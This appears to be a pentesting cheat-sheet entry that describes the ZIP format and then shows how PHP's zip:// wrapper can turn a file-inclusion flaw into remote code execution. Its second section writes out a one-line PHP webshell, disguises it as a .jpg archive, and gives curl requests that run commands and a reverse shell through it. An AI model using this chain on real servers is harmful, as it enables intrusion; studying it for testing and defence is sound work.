ZIP

The ZIP file type is a widely used archive format designed to compress and bundle one or more files or directories into a single file for storage, distribution, or transport. It employs lossless compression algorithms, most commonly DEFLATE, to reduce file size without affecting the original content. A ZIP archive contains a central directory that lists the files, their metadata, and their compressed or uncompressed sizes, enabling efficient extraction and navigation of its contents.

ZIP files can store any type of data, including documents, images, executables, and even other archives, making them highly versatile. Many operating systems and applications provide native support for creating and extracting ZIP files, which contributes to their ubiquity. From a security perspective, ZIP archives can be abused to deliver malicious payloads, conceal executable code, or exploit vulnerabilities in archive parsing libraries. Password protection and encryption are supported, although implementations vary in strength, and weak encryption methods may be easily bypassed.

ZIP WRAPPER

The zip wrapper (not enabled by default) allows to achieve RCE by archiving a webshell into a zip file ending in an allowed extension, e.g. .jpg. The files within the archived can be reached using #. This has a higher chance to work if ZIP uploads are allowed by the application, as content-type filters may block it.

# Create and archive a webshell (zip file = shell.jpg)
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

# Upload → RCE (URL-encode '#' -> %23)
curl http://<ip:port>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

If ZIP uploads are allowed or the application stores the uploaded files in ZIP format, the shell can be uploaded directly and then accessed with or without the extension (depending on the code implementation):

$ curl --path-as-is "http://target-instance/index.php?file=zip://uploads/upload_1754572937.zip%23php-reverse-shell"